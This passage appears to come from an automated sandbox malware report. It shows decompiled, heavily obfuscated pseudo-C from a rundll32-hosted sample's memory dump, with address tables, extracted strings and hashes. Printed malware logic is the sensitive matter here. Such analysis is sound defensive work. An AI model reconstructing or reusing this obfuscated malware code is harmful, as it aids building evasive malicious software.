				_v1072 = _v1072 * 0x7c;
				_v1072 = _v1072 ^ 0x12da7d33;
				_v1124 = 0xc51f8;
				_v1124 = _v1124 * 0x7c;
				_v1124 = _v1124 | 0x22e20644;
				_v1124 = _v1124 + 0xffff053d;
				_v1124 = _v1124 ^ 0x27f3e63a;
				_v1080 = 0x33633f;
				_v1080 = _v1080 / _t275;
				_v1080 = _v1080 ^ 0x000716b7;
				E007B5C73(_t275);
				do {
					while(_t310 != 0xc63ed) {
						if(_t310 == 0x5b9c87d) {
							_push(_v1104);
							_push(_v1140);
							_t263 = E007BDCF7(_v1084, 0x7a1060, __eflags);
							_t264 = E007BD25E(_v1120);
							_t282 =  *0x7c3e10; // 0x0
							_t265 =  *0x7c3e10; // 0x0
							E007B453F(_v1100, __eflags, _v1132, _t263, _v1064, _t265 + 0x23c, _t282 + 0x1c, _v1076, _v1108, _t264, _t282 + 0x1c);
							_t268 = E007AA8B0(_v1088, _t263, _v1092);
							_t314 =  &(_t314[0xa]);
							_t310 = 0xc63ed;
							continue;
						} else {
							if(_t310 == 0xb516bbb) {
								_t310 = 0xc84e726;
								continue;
							} else {
								_t319 = _t310 - 0xc84e726;
								if(_t310 == 0xc84e726) {
									_push(_v1128);
									_push(_v1152);
									_t269 = E007BDCF7(_v1136, 0x7a1000, _t319);
									_t289 =  *0x7c3e10; // 0x0
									_t306 =  *0x7c3e10; // 0x0
									E007A47CE(_t306 + 0x23c, _v1156, _t289 + 0x1c, _v1164, _v1112, _t269, _t289 + 0x1c, _v1116, _v1144);
									_t268 = E007AA8B0(_v1068, _t269, _v1148);
									_t314 =  &(_t314[9]);
									_t310 = 0x5b9c87d;
									continue;
								}
							}
						}
						goto L9;
					}
					_push(_v1080);
					_push( &_v1040);
					_push(_v1124);
					E007C13AD(_v1072,  &_v520, __eflags);
					_t314 =  &(_t314[3]);
					_t310 = 0xafb2886;
					L9:
					__eflags = _t310 - 0xafb2886;
				} while (__eflags != 0);
				return _t268;
			}

0x007b66ca
0x007b66d0
0x007b66d7
0x007b66df
0x007b66e7
0x007b66ef
0x007b66f7
0x007b66ff
0x007b6711
0x007b6716
0x007b671c
0x007b6724
0x007b6729
0x007b6731
0x007b6736
0x007b673e
0x007b674b
0x007b674c
0x007b6750
0x007b6758
0x007b6760
0x007b6768
0x007b6770
0x007b6778
0x007b6780
0x007b6788
0x007b6790
0x007b6798
0x007b67a0
0x007b67a8
0x007b67b0
0x007b67b8
0x007b67c0
0x007b67c8
0x007b67d0
0x007b67d8
0x007b67e0
0x007b67e8
0x007b67ed
0x007b67f2
0x007b67f7
0x007b67ff
0x007b6807
0x007b680f
0x007b6814
0x007b681c
0x007b6824
0x007b682c
0x007b6834
0x007b683c
0x007b6844
0x007b6851
0x007b6855
0x007b685a
0x007b6862
0x007b686a
0x007b6872
0x007b687a
0x007b6888
0x007b688c
0x007b6894
0x007b689c
0x007b68a4
0x007b68ac
0x007b68b4
0x007b68bc
0x007b68c4
0x007b68c9
0x007b68ce
0x007b68d8
0x007b68e0
0x007b68e8
0x007b68ed
0x007b68f2
0x007b68fa
0x007b6902
0x007b690a
0x007b6912
0x007b691a
0x007b6922
0x007b692a
0x007b6932
0x007b693a
0x007b6942
0x007b694a
0x007b6952
0x007b695a
0x007b6962
0x007b6967
0x007b696f
0x007b6977
0x007b6986
0x007b6989
0x007b698d
0x007b6995
0x007b699d
0x007b69a5
0x007b69ad
0x007b69b5
0x007b69ba
0x007b69bf
0x007b69c7
0x007b69d7
0x007b69db
0x007b69e3
0x007b69eb
0x007b69f3
0x007b69fb
0x007b6a08
0x007b6a09
0x007b6a0d
0x007b6a15
0x007b6a22
0x007b6a26
0x007b6a2e
0x007b6a36
0x007b6a3e
0x007b6a4c
0x007b6a50
0x007b6a60
0x007b6a74
0x007b6a74
0x007b6a82
0x007b6b0d
0x007b6b16
0x007b6b1e
0x007b6b2f
0x007b6b34
0x007b6b47
0x007b6b6a
0x007b6b7c
0x007b6b81
0x007b6b84
0x00000000
0x007b6a88
0x007b6a8e
0x007b6b06
0x00000000
0x007b6a90
0x007b6a90
0x007b6a92
0x007b6a98
0x007b6aa1
0x007b6aa9
0x007b6aba
0x007b6ad2
0x007b6ae5
0x007b6af7
0x007b6afc
0x007b6aff
0x00000000
0x007b6aff
0x007b6a92
0x007b6a8e
0x00000000
0x007b6a82
0x007b6b8e
0x007b6b99
0x007b6b9a
0x007b6ba9
0x007b6bae
0x007b6bb1
0x007b6bb3
0x007b6bb3
0x007b6bb3
0x007b6bc5

Strings

Md, xrefs: 007B68E0
<E, xrefs: 007B682C
?c3, xrefs: 007B6A3E
a@, xrefs: 007B68FA
yw, xrefs: 007B691A

Memory Dump Source

Source File: 00000009.00000002.497023590.00000000007A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000009.00000002.497015544.00000000007A0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.497057228.00000000007C3000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: <E$?c3$Md$a@$yw
API String ID: 0-2084988834
Opcode ID: f0634ba2bf40c229d1479f9d7934af1c070f19714aa792452d8cf0b2cfdacbc3
Instruction ID: e352c451c3060db707eca583bca38c6af49256bd07232d426d4e303be2c601c8
Opcode Fuzzy Hash: f0634ba2bf40c229d1479f9d7934af1c070f19714aa792452d8cf0b2cfdacbc3
Instruction Fuzzy Hash: A6C121724083809FD368CF25C58A95BBBF2FBD4758F108A1DF5A596260D3B98909CF43

Uniqueness

Uniqueness Score: -1.00%

Function 007B0001 Relevance: 6.4, Strings: 5, Instructions: 191
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E007B0001(void* __ecx, void* __edx, intOrPtr _a4) {
				char _v128;
				signed int _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				char _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				void* _t154;
				void* _t174;
				char _t178;
				void* _t183;
				char* _t189;
				void* _t209;
				signed int _t210;
				signed int _t211;
				signed int _t212;
				signed int _t213;
				signed int _t214;
				signed int _t215;
				signed int _t216;
				signed int* _t220;

				_push(_a4);
				_t209 = __edx;
				_push(__edx);
				_push(__ecx);
				E007B20B9(_t154);
				_v132 = _v132 & 0x00000000;
				_t220 =  &(( &_v204)[3]);
				_v140 = 0x6f537b;
				_v136 = 0x2895cf;
				_t183 = 0xf669bfa;
				_v164 = 0xc3509d;
				_v164 = _v164 >> 0xf;
				_v164 = _v164 ^ 0x0007728b;
				_v188 = 0x58efa0;
				_v188 = _v188 + 0xffff9444;
				_t210 = 0x2f;
				_v188 = _v188 / _t210;
				_v188 = _v188 ^ 0x000ac4b2;
				_v176 = 0xa783cc;
				_v176 = _v176 << 0xa;
				_v176 = _v176 ^ 0x73295065;
				_v176 = _v176 ^ 0xed239367;
				_v148 = 0x42262a;
				_v148 = _v148 | 0x228e56d6;
				_v148 = _v148 ^ 0x22cd87d0;
				_v204 = 0xc47428;
				_v204 = _v204 + 0xffff2e33;
				_v204 = _v204 + 0xffff2fa2;
				_v204 = _v204 + 0xffff28a7;
				_v204 = _v204 ^ 0x00c63754;
				_v156 = 0x11bd56;
				_t211 = 0x5c;
				_v156 = _v156 * 0x6a;
				_v156 = _v156 ^ 0x0752342f;
				_v172 = 0x489beb;
				_v172 = _v172 + 0xfe21;
				_v172 = _v172 / _t211;
				_v172 = _v172 ^ 0x0000a4d4;
				_v192 = 0x2e5859;
				_v192 = _v192 ^ 0x83ba67d9;
				_t212 = 0x44;
				_v192 = _v192 / _t212;
				_v192 = _v192 ^ 0x01e00d99;
				_v180 = 0x89bc6d;
				_v180 = _v180 | 0xb1d25d45;
				_v180 = _v180 << 0xe;
				_v180 = _v180 ^ 0xff5cc309;
				_v168 = 0x19805c;
				_t213 = 0x18;
				_v168 = _v168 * 0x16;
				_v168 = _v168 ^ 0x4d2845a5;
				_v168 = _v168 ^ 0x4f1adce1;
				_v196 = 0x9cfdcd;
				_v196 = _v196 / _t213;
				_v196 = _v196 + 0xd8a6;
				_v196 = _v196 ^ 0x0005e56c;
				_v200 = 0x1d77da;
				_t214 = 0x6b;
				_v200 = _v200 / _t214;
				_t215 = 9;
				_v200 = _v200 / _t215;
				_t216 = 0x59;
				_v200 = _v200 / _t216;
				_v200 = _v200 ^ 0x00052bad;
				_v184 = 0x474669;
				_v184 = _v184 * 0x25;
				_v184 = _v184 + 0xffff8141;
				_v184 = _v184 ^ 0x0a4cf000;
				_v160 = 0x98ddfb;
				_v160 = _v160 << 3;
				_v160 = _v160 ^ 0x04cf55b1;
				_v152 = 0xbbc225;
				_v152 = _v152 * 0x58;
				_v152 = _v152 ^ 0x408ec409;
				while(_t183 != 0x4a2a3c4) {
					if(_t183 == 0x640e5f9) {
						__eflags = _v128;
						_t189 =  &_v128;
						while(__eflags != 0) {
							_t178 =  *_t189;
							__eflags = _t178 - 0x30;
							if(_t178 < 0x30) {
								L10:
								__eflags = _t178 - 0x61;
								if(_t178 < 0x61) {
									L12:
									__eflags = _t178 - 0x41;
									if(_t178 < 0x41) {
										L14:
										 *_t189 = 0x58;
									} else {
										__eflags = _t178 - 0x5a;
										if(_t178 > 0x5a) {
											goto L14;
										}
									}
								} else {
									__eflags = _t178 - 0x7a;
									if(_t178 > 0x7a) {
										goto L12;
									}
								}
							} else {
								__eflags = _t178 - 0x39;
								if(_t178 > 0x39) {
									goto L10;
								}
							}
							_t189 = _t189 + 1;
							__eflags =  *_t189;
						}
						_t183 = 0x4a2a3c4;
						continue;
					} else {
						if(_t183 == 0x7562914) {
							_v144 = 0x80;
							_t178 = E007ACD29(_v164,  &_v144, _v176,  &_v128);
							_t220 =  &(_t220[3]);
							_t183 = 0x640e5f9;
							continue;
						} else {
							if(_t183 == 0xf669bfa) {
								_t183 = 0x7562914;
								continue;
							}
						}
					}
					L18:
					__eflags = _t183 - 0x1718ff4;
					if(__eflags != 0) {
						continue;
					}
					return _t178;
				}
				_push(_v172);
				_push(_v156);
				_push(_v204);
				_t174 = E007B8606(_v148, 0x7a1690, __eflags);
				E007A2206( &_v128, _t209, _v196, _v200, _t174, E007AEE81(__eflags), _v184);
				_t178 = E007AA8B0(_v160, _t174, _v152);
				_t220 =  &(_t220[0xb]);
				_t183 = 0x1718ff4;
				goto L18;
			}

0x007b000b
0x007b0012
0x007b0014
0x007b0015
0x007b0016
0x007b001b
0x007b0020
0x007b0023
0x007b002d
0x007b0035
0x007b003a
0x007b0042
0x007b0047
0x007b004f
0x007b0057
0x007b0065
0x007b006a
0x007b0070
0x007b0078
0x007b0080
0x007b0085
0x007b008d
0x007b0095
0x007b009d
0x007b00a5
0x007b00ad
0x007b00b5
0x007b00bd
0x007b00c5
0x007b00cd
0x007b00d5
0x007b00e2
0x007b00e5
0x007b00e9
0x007b00f1
0x007b00f9
0x007b0109
0x007b010d
0x007b0115
0x007b011d
0x007b0129
0x007b012e
0x007b0134
0x007b013c
0x007b0144
0x007b014c
0x007b0151
0x007b0159
0x007b0166
0x007b0167
0x007b016b
0x007b0173
0x007b017b
0x007b0189
0x007b018d
0x007b0195
0x007b019f
0x007b01ad
0x007b01b2
0x007b01c1
0x007b01c6
0x007b01d5
0x007b01d8
0x007b01dc
0x007b01e4
0x007b01f1
0x007b01f5
0x007b01fd
0x007b0205
0x007b020d
0x007b0212
0x007b021a
0x007b0227
0x007b022b
0x007b0233
0x007b023d
0x007b0280
0x007b0285
0x007b0289
0x007b028b
0x007b028d
0x007b028f
0x007b0295
0x007b0295
0x007b0297
0x007b029d
0x007b029d
0x007b029f
0x007b02a5
0x007b02a5
0x007b02a1
0x007b02a1
0x007b02a3
0x00000000
0x00000000
0x007b02a3
0x007b0299
0x007b0299
0x007b029b
0x00000000
0x00000000
0x007b029b
0x007b0291
0x007b0291
0x007b0293
0x00000000
0x00000000
0x007b0293
0x007b02a8
0x007b02a9
0x007b02a9
0x007b02ae
0x00000000
0x007b023f
0x007b0241
0x007b0257
0x007b0271
0x007b0276
0x007b0279
0x00000000
0x007b0243
0x007b0249
0x007b024f
0x00000000
0x007b024f
0x007b0249
0x007b0241
0x007b030f
0x007b030f
0x007b0315
0x00000000
0x00000000
0x007b0325
0x007b0325
0x007b02b2
0x007b02bb
0x007b02bf
0x007b02c7
0x007b02f3
0x007b0302
0x007b0307
0x007b030a
0x00000000

Strings

{So, xrefs: 007B0023
*&B, xrefs: 007B0095
iFG, xrefs: 007B01E4
YX., xrefs: 007B0115
eP)s, xrefs: 007B0085

Memory Dump Source

Source File: 00000009.00000002.497023590.00000000007A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000009.00000002.497015544.00000000007A0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.497057228.00000000007C3000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: *&B$YX.$eP)s$iFG${So
API String ID: 0-3810143839
Opcode ID: 0a2cd78960f471ca3253aa3a131e313be7b89b4607c4e28ab3512e203a6b0678
Instruction ID: 02b641dd1c76b78603e564f11377c3c34f6d28a63baf206121fd2a38a3c32561
Opcode Fuzzy Hash: 0a2cd78960f471ca3253aa3a131e313be7b89b4607c4e28ab3512e203a6b0678
Instruction Fuzzy Hash: 888197715093409FD3A8CF25D589A9BBBE2BBC6718F00591DF18586261D3B8C94ACF83

Uniqueness

Uniqueness Score: -1.00%

Function 007A7735 Relevance: 6.4, Strings: 5, Instructions: 191
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E007A7735(void* __edx, intOrPtr _a4, signed int* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v44;
				void* _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				unsigned int _v112;
				unsigned int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void* __ecx;
				void* _t163;
				signed int _t176;
				void* _t188;
				signed int _t205;
				signed int* _t207;
				void* _t209;
				void* _t210;

				_t186 = _a4;
				_t207 = _a8;
				_push(_a16);
				_push(_a12);
				_push(_t207);
				_push(_a4);
				_push(__edx);
				E007B20B9(_t163);
				_v60 = 0x524796;
				_t210 = _t209 + 0x18;
				asm("stosd");
				_t188 = 0x9c25eae;
				asm("stosd");
				asm("stosd");
				_v76 = 0x29f01;
				_v76 = _v76 | 0x94be009d;
				_v76 = _v76 ^ 0x94be9f9d;
				_v108 = 0xafa956;
				_v108 = _v108 + 0x628;
				_v108 = _v108 ^ 0xf539d3de;
				_v108 = _v108 ^ 0xf5927b2e;
				_v92 = 0x300c11;
				_v92 = _v92 ^ 0x95f7d427;
				_v92 = _v92 ^ 0x95c19bc8;
				_v116 = 0x7fd72e;
				_v116 = _v116 >> 0x10;
				_v116 = _v116 + 0x5d9b;
				_v116 = _v116 ^ 0x0001fda4;
				_v88 = 0x25a82f;
				_t205 = 0x1b;
				_v88 = _v88 * 0x72;
				_v88 = _v88 ^ 0x10cad58f;
				_v100 = 0xf91ce5;
				_v100 = _v100 >> 0xc;
				_v100 = _v100 ^ 0x71d91e41;
				_v100 = _v100 ^ 0x71d9c87d;
				_v136 = 0x5a524;
				_v136 = _v136 ^ 0x65d544fc;
				_v136 = _v136 / _t205;
				_v136 = _v136 + 0xdad4;
				_v136 = _v136 ^ 0x03c43220;
				_v68 = 0xd5537a;
				_v68 = _v68 + 0xffffd52f;
				_v68 = _v68 ^ 0x00d2b66c;
				_v128 = 0x59397b;
				_v128 = _v128 ^ 0x5dfc0cc3;
				_v128 = _v128 + 0x56f6;
				_v128 = _v128 + 0xff83;
				_v128 = _v128 ^ 0x5dafd3d4;
				_v104 = 0x85edfa;
				_v104 = _v104 | 0x32b3baf7;
				_v104 = _v104 ^ 0x32b12396;
				_v112 = 0x4c4fc6;
				_v112 = _v112 + 0xbf9f;
				_v112 = _v112 >> 1;
				_v112 = _v112 ^ 0x002f2047;
				_v120 = 0xc21a43;
				_v120 = _v120 | 0x0781619f;
				_v120 = _v120 ^ 0x30a197e6;
				_v120 = _v120 ^ 0x376a3e6d;
				_v84 = 0xaf6a80;
				_v84 = _v84 + 0xffff12f3;
				_v84 = _v84 ^ 0x00ae6f5f;
				_v64 = 0x7bdfb0;
				_v64 = _v64 >> 2;
				_v64 = _v64 ^ 0x00114c08;
				_v96 = 0x6b35de;
				_v96 = _v96 * 0x60;
				_v96 = _v96 ^ 0x283b6418;
				_v124 = 0x52b9d2;
				_v124 = _v124 | 0x40c5122c;
				_v124 = _v124 << 8;
				_v124 = _v124 >> 0x10;
				_v124 = _v124 ^ 0x0001910d;
				_v132 = 0x44d0f9;
				_v132 = _v132 * 0x29;
				_v132 = _v132 + 0xf17;
				_v132 = _v132 * 0x65;
				_v132 = _v132 ^ 0x592f3fb2;
				_v72 = 0xc75ad6;
				_v72 = _v72 ^ 0xe0bef3a1;
				_v72 = _v72 ^ 0xe072572c;
				_v80 = 0xa6c1d6;
				_v80 = _v80 + 0xc8d;
				_v80 = _v80 ^ 0x00ac29a9;
				do {
					while(_t188 != 0xe27b71) {
						if(_t188 == 0x372e88b) {
							_push(_t188);
							_push(_t188);
							_t176 = E007A7FF2(_t207[1]);
							 *_t207 = _t176;
							__eflags = _t176;
							if(__eflags != 0) {
								_t188 = 0xe27b71;
								continue;
							}
						} else {
							if(_t188 == 0x93f98fe) {
								_t207[1] = E007C0C14(_t186);
								_t188 = 0x372e88b;
								continue;
							} else {
								if(_t188 == 0x9c25eae) {
									_t188 = 0x93f98fe;
									 *_t207 =  *_t207 & 0x00000000;
									_t207[1] = _v76;
									continue;
								} else {
									if(_t188 == 0xa0c9f29) {
										_t146 =  &_v112; // 0x2f2047
										E007B0DAF(_v68,  &_v44, _v128,  *((intOrPtr*)(_t186 + 0x48)), _v104,  *_t146);
										_t210 = _t210 + 0x10;
										_t188 = 0xc7f60b3;
										continue;
									} else {
										if(_t188 == 0xc7f60b3) {
											_t144 =  &_v84; // 0xe072572c
											E007C0E3A( &_v44, _v120, __eflags,  *_t144, _v64, _v96, _t186 + 0x14);
											_t210 = _t210 + 0x10;
											_t188 = 0xcf8cba1;
											continue;
										} else {
											_t219 = _t188 - 0xcf8cba1;
											if(_t188 != 0xcf8cba1) {
												goto L17;
											} else {
												E007C0E3A( &_v44, _v124, _t219, _v132, _v72, _v80, _t186 + 0x38);
											}
										}
									}
								}
							}
						}
						L9:
						return 0 |  *_t207 != 0x00000000;
					}
					E007A3DBC( &_v44, _t207, _v88, _v100, _v136);
					_t210 = _t210 + 0xc;
					_t188 = 0xa0c9f29;
					L17:
					__eflags = _t188 - 0x560a718;
				} while (__eflags != 0);
				goto L9;
			}

0x007a773c
0x007a7745
0x007a774d
0x007a7754
0x007a775b
0x007a775c
0x007a775d
0x007a775f
0x007a7764
0x007a7772
0x007a7775
0x007a7778
0x007a777f
0x007a7780
0x007a7781
0x007a7789
0x007a7791
0x007a7799
0x007a77a1
0x007a77a9
0x007a77b1
0x007a77b9
0x007a77c1
0x007a77c9
0x007a77d1
0x007a77d9
0x007a77de
0x007a77e6
0x007a77ee
0x007a77fb
0x007a77fc
0x007a7800
0x007a7808
0x007a7810
0x007a7815
0x007a781d
0x007a7825
0x007a782d
0x007a783b
0x007a783f
0x007a7847
0x007a784f
0x007a7857
0x007a785f
0x007a7867
0x007a786f
0x007a7877
0x007a787f
0x007a7887
0x007a788f
0x007a7897
0x007a789f
0x007a78a7
0x007a78af
0x007a78b7
0x007a78bb
0x007a78c3
0x007a78cb
0x007a78d3
0x007a78db
0x007a78e3
0x007a78eb
0x007a78f3
0x007a78fb
0x007a7903
0x007a7908
0x007a7910
0x007a791d
0x007a7921
0x007a792e
0x007a793b
0x007a7943
0x007a7948
0x007a794d
0x007a7955
0x007a7962
0x007a7966
0x007a7973
0x007a7977
0x007a797f
0x007a7987
0x007a798f
0x007a7997
0x007a799f
0x007a79a7
0x007a79af
0x007a79af
0x007a79bd
0x007a7aac
0x007a7aad
0x007a7aae
0x007a7ab3
0x007a7ab7
0x007a7ab9
0x007a7abf
0x00000000
0x007a7abf
0x007a79c3
0x007a79c5
0x007a7a90
0x007a7a93
0x00000000
0x007a79cb
0x007a79d1
0x007a7a7c
0x007a7a7e
0x007a7a81
0x00000000
0x007a79d7
0x007a79dd
0x007a7a4f
0x007a7a66
0x007a7a6b
0x007a7a6e
0x00000000
0x007a79df
0x007a79e5
0x007a7a35
0x007a7a3d
0x007a7a42
0x007a7a45
0x00000000
0x007a79e7
0x007a79e7
0x007a79ed
0x00000000
0x007a79f3
0x007a7a0b
0x007a7a10
0x007a79ed
0x007a79e5
0x007a79dd
0x007a79d1
0x007a79c5
0x007a7a13
0x007a7a24
0x007a7a24
0x007a7ad8
0x007a7add
0x007a7ae0
0x007a7ae5
0x007a7ae5
0x007a7ae5
0x00000000

Strings

,Wr, xrefs: 007A7A35
{9Y, xrefs: 007A7867
q{, xrefs: 007A7929
m>j7, xrefs: 007A78DB
G /, xrefs: 007A7A4F

Memory Dump Source

Source File: 00000009.00000002.497023590.00000000007A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000009.00000002.497015544.00000000007A0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.497057228.00000000007C3000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: ,Wr$G /$m>j7$q{${9Y
API String ID: 0-2956538602
Opcode ID: aad4c5470bf923e8e08ddaad0ee87e401980107f56092e5079a3be882124f178
Instruction ID: cd3788863c09e29f7bcea97a22d34d0edf4ab8b078aa993257054d7e4aae789d
Opcode Fuzzy Hash: aad4c5470bf923e8e08ddaad0ee87e401980107f56092e5079a3be882124f178
Instruction Fuzzy Hash: E69130711093419FD368CF65D98A92BBBE1FBC5708F109A1DF19296220D3B98A49CF83

Uniqueness

Uniqueness Score: -1.00%

Function 007A4816 Relevance: 6.4, Strings: 5, Instructions: 180
COMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E007A4816(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				void* _t164;
				void* _t179;
				signed int _t190;
				signed int _t191;
				signed int _t192;
				signed int _t193;
				void* _t196;
				void* _t213;
				void* _t214;
				signed int* _t217;

				_push(_a16);
				_t213 = __edx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E007B20B9(_t164);
				_v4 = _v4 & 0x00000000;
				_t217 =  &(( &_v88)[6]);
				_v16 = 0xc0a747;
				_v12 = 0xade381;
				_t214 = 0;
				_v8 = 0x11050f;
				_t196 = 0x5adc597;
				_v84 = 0xdf9e69;
				_v84 = _v84 >> 2;
				_v84 = _v84 + 0xffff5795;
				_v84 = _v84 >> 5;
				_v84 = _v84 ^ 0x0001b9f8;
				_v68 = 0xf2d8cd;
				_v68 = _v68 << 6;
				_v68 = _v68 | 0xe3b79c6a;
				_v68 = _v68 + 0xec5a;
				_v68 = _v68 ^ 0xffb8abc5;
				_v40 = 0x5d8c34;
				_v40 = _v40 >> 9;
				_v40 = _v40 ^ 0x40002ec6;
				_v28 = 0x37ca39;
				_v28 = _v28 | 0x456668c2;
				_v28 = _v28 ^ 0x0577eafb;
				_v80 = 0xd16358;
				_v80 = _v80 ^ 0xe637ce9d;
				_t190 = 0x68;
				_v80 = _v80 * 0x4b;
				_v80 = _v80 << 2;
				_v80 = _v80 ^ 0x965c2e63;
				_v56 = 0xfc1806;
				_v56 = _v56 + 0xffffb57d;
				_v56 = _v56 | 0x299c1b97;
				_v56 = _v56 ^ 0x29fc2736;
				_v44 = 0x81586;
				_v44 = _v44 | 0xba5390c4;
				_v44 = _v44 ^ 0xba584850;
				_v60 = 0x52e6aa;
				_v60 = _v60 >> 0xa;
				_v60 = _v60 * 0x28;
				_v60 = _v60 ^ 0x00066c4e;
				_v48 = 0x7a334;
				_v48 = _v48 + 0xfffff5af;
				_v48 = _v48 ^ 0x0009652d;
				_v52 = 0x3bf8e8;
				_v52 = _v52 / _t190;
				_v52 = _v52 ^ 0x00025bcb;
				_v64 = 0xacc490;
				_t191 = 0x6f;
				_v64 = _v64 / _t191;
				_v64 = _v64 ^ 0xce7acdce;
				_v64 = _v64 ^ 0xce756fa5;
				_v88 = 0x557b83;
				_v88 = _v88 ^ 0xfc4fd146;
				_v88 = _v88 ^ 0x87bb4e9a;
				_v88 = _v88 ^ 0x18fbc6ce;
				_v88 = _v88 ^ 0x635c68ef;
				_v24 = 0xa24557;
				_t192 = 0x23;
				_v24 = _v24 / _t192;
				_v24 = _v24 ^ 0x00019ec3;
				_v72 = 0x274d3f;
				_v72 = _v72 + 0x3236;
				_v72 = _v72 + 0x71a1;
				_v72 = _v72 + 0x1749;
				_v72 = _v72 ^ 0x0028bc49;
				_v32 = 0x96c762;
				_t193 = 0x44;
				_v32 = _v32 / _t193;
				_v32 = _v32 ^ 0x000b5918;
				_v76 = 0x2f082c;
				_v76 = _v76 + 0x52f3;
				_v76 = _v76 + 0x7ae4;
				_v76 = _v76 ^ 0x81d2744f;
				_v76 = _v76 ^ 0x81f68fa5;
				_v36 = 0x9357ce;
				_v36 = _v36 + 0xfffffb26;
				_v36 = _v36 ^ 0x009b03e6;
				do {
					while(_t196 != 0x4d42949) {
						if(_t196 == 0x5adc597) {
							_t196 = 0x4d42949;
							continue;
						} else {
							if(_t196 == 0x78e32ab) {
								E007B847F(_v24, _t213, _v28 | _v68, _v72, _a8, _v32, _t214, _v76, _v36,  &_v20);
							} else {
								if(_t196 != 0xf2775cd) {
									goto L11;
								} else {
									_push(_t196);
									_push(_t196);
									_t214 = E007A7FF2(_v20 + _v20);
									if(_t214 != 0) {
										_t196 = 0x78e32ab;
										continue;
									}
								}
							}
						}
						L14:
						return _t214;
					}
					_t179 = E007B847F(_v80, _t213, _v40 | _v84, _v56, _a8, _v44, 0, _v60, _v48,  &_v20);
					_t217 =  &(_t217[8]);
					if(_t179 == 0) {
						_t196 = 0xc32537b;
						goto L11;
					} else {
						_t196 = 0xf2775cd;
						continue;
					}
					goto L14;
					L11:
				} while (_t196 != 0xc32537b);
				goto L14;
			}

0x007a481d
0x007a4821
0x007a4823
0x007a4827
0x007a482b
0x007a482f
0x007a4830
0x007a4831
0x007a4836
0x007a483b
0x007a483e
0x007a4848
0x007a4850
0x007a4852
0x007a485a
0x007a485f
0x007a4867
0x007a486c
0x007a4874
0x007a4879
0x007a4881
0x007a4889
0x007a488e
0x007a4896
0x007a489e
0x007a48a6
0x007a48ae
0x007a48b3
0x007a48bb
0x007a48c3
0x007a48cb
0x007a48d3
0x007a48db
0x007a48ea
0x007a48ed
0x007a48f1
0x007a48f6
0x007a48fe
0x007a4906
0x007a490e
0x007a4916
0x007a491e
0x007a4926
0x007a492e
0x007a4936
0x007a493e
0x007a4948
0x007a494c
0x007a4954
0x007a495c
0x007a4964
0x007a496c
0x007a497c
0x007a4980
0x007a4988
0x007a4994
0x007a4997
0x007a499b
0x007a49a3
0x007a49ab
0x007a49b3
0x007a49bb
0x007a49c3
0x007a49cb
0x007a49d5
0x007a49e3
0x007a49e8
0x007a49ee
0x007a49fb
0x007a4a03
0x007a4a0b
0x007a4a13
0x007a4a1b
0x007a4a23
0x007a4a2f
0x007a4a37
0x007a4a3b
0x007a4a43
0x007a4a4b
0x007a4a53
0x007a4a5b
0x007a4a63
0x007a4a6b
0x007a4a73
0x007a4a7b
0x007a4a83
0x007a4a83
0x007a4a8d
0x007a4ac9
0x00000000
0x007a4a8f
0x007a4a91
0x007a4b4f
0x007a4a97
0x007a4a9d
0x00000000
0x007a4a9f
0x007a4aaf
0x007a4ab0
0x007a4ab9
0x007a4abf
0x007a4ac5
0x00000000
0x007a4ac5
0x007a4abf
0x007a4a9d
0x007a4a91
0x007a4b58
0x007a4b60
0x007a4b60
0x007a4afa
0x007a4aff
0x007a4b04
0x007a4b10
0x00000000
0x007a4b06
0x007a4b06
0x00000000
0x007a4b06
0x00000000
0x007a4b15
0x007a4b15
0x00000000

Strings

?M', xrefs: 007A49FB
z, xrefs: 007A4A53
h\c, xrefs: 007A4A9F
62, xrefs: 007A4A03
-e, xrefs: 007A4964

Memory Dump Source

Source File: 00000009.00000002.497023590.00000000007A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000009.00000002.497015544.00000000007A0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.497057228.00000000007C3000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

